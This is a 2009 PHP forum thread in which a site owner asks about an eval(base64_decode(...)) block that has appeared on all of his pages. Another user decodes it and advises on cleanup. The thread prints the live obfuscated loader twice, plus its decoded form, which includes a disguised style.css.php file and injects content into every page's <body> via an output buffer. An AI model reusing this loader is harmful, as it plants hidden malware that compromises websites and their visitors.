phpfan101 Posted December 16, 2009 Share Posted December 16, 2009 <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2NyaW1lL3B1YmxpY19odG1sL3QyL3NhbmRib3gvYmFja3VwLTguNi4yMDA4XzIwLTE1LTIwX3NvY3JpbWUvaG9tZWRpci9wdWJsaWNfaHRtbC9waHB0ZXN0aW5nL3g3Y2hhdDIvZG9jcy9pbnN0YWxsLmRyYWdvbmZseS94N2NoYXQvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvY3JpbWUvcHVibGljX2h0bWwvdDIvc2FuZGJveC9iYWNrdXAtOC42LjIwMDhfMjAtMTUtMjBfc29jcmltZS9ob21lZGlyL3B1YmxpY19odG1sL3BocHRlc3RpbmcveDdjaGF0Mi9kb2NzL2luc3RhbGwuZHJhZ29uZmx5L3g3Y2hhdC9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> Can any help me find out what this means???? its appearing on all of my pages, i have no clue what it is Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2NyaW1lL3B1YmxpY19odG1sL3QyL3NhbmRib3gvYmFja3VwLTguNi4yMDA4XzIwLTE1LTIwX3NvY3JpbWUvaG9tZWRpci9wdWJsaWNfaHRtbC9waHB0ZXN0aW5nL3g3Y2hhdDIvZG9jcy9pbnN0YWxsLmRyYWdvbmZseS94N2NoYXQvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvY3JpbWUvcHVibGljX2h0bWwvdDIvc2FuZGJveC9iYWNrdXAtOC42LjIwMDhfMjAtMTUtMjBfc29jcmltZS9ob21lZGlyL3B1YmxpY19odG1sL3BocHRlc3RpbmcveDdjaGF0Mi9kb2NzL2luc3RhbGwuZHJhZ29uZmx5L3g3Y2hhdC9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> Can any help me find out what this means???? its appearing on all of my pages, i have no clue what it is It's base64, an almost sad form of obfuscation, but here's the decoded result: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&{$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}} There's no lines since the base64 encoding stripped them. EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason.. 'install.dragonfly', Not sure what dragonfly is. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 but how is it affecting me? ... and how did it get there? Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 but how is it affecting me? ... and how did it get there? It looks like it's attempting to replace your 'body' tags with some sort of chat? Or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP/Your site account's. And remove it from every file you have. EDIT: Dragonfly looks like it's a CMS, do you use this? It may have been autogenerated if you're using some sort of content generator.. But i'm not sure why it would be encoded, I still think it's not supposed to be there. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 lol, all 983? I see a fun night coming up! Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 lol, all 983? I see a fun night coming up! Wow, Man that must suck.. I'd recommend using some sort of batch text replacer, shouldn't be too hard to FTP them off site and use one, I've found some online. If the codes are the same (should be) you can simply replace them all at one go. But yeah, change your passwords! Good luck. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 but, when there gone, my content isnt showing??? how do i fix that? and i have never heard of dragogon fly, no Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 but, when there gone, my content isnt showing??? how do i fix that? and i have never heard of dragogon fly, no Uh oh.. Are there any other files on your server such as .htaccess that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code, look in your php file that doesn't work without it for example, is that the only thing changed? I'd look online with some of that code.. You can re-decode the base64 here if you wish http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset= There may be an entry somewhere online describing the type of attack and how to remove it. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 .htaccess AuthName "test" AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd" thats all of it... should i delete it? Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 .htaccess AuthName "test" AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd" thats all of it... should i delete it? I just need to know, is your hosting username 'socrime' or similar? But yes, if you did not create that than you should delete it , from the looks of it, it's hiding the directories of domain.com/2/.. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 yea, thats my hosting name, and no, i didnt create it Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 yea, thats my hosting name, and no, i didnt create it You may want to delete the folder named '2' on your root. This may be an entry the person has created to get back into your site or something. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 done... pages where i deleted the base decode... still not working tho Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 16, 2009 Share Posted December 16, 2009 done... pages where i deleted the base decode... still not working tho Maybe upload and show me a full page, such as your index. Maybe something was changed, I could spot it if it's in the .php file itself. If it isn't, than php.ini or so may have been modified. Quote Link to comment Share on other sites More sharing options...
phpfan101 Posted December 16, 2009 Author Share Posted December 16, 2009 I'm positive it hasn't been further modified(the page i found it on) i did notice some "core.33134" files appeared, i think there encoded though about 10 files actually, all "core.(some number)" Quote Link to comment Share on other sites More sharing options...
oni-kun Posted December 17, 2009 Share Posted December 17, 2009 I'm positive it hasn't been further modified(the page i found it on) i did notice some "core.33134" files appeared, i think there encoded though about 10 files actually, all "core.(some number)" There are some threads with somewhat helpful info here.. http://forums.oscommerce.com/index.php?showtopic=344262 http://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/ But yeah, from the look of it, and the nature of php being open source, you're messed without a backup or a lot of time.. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.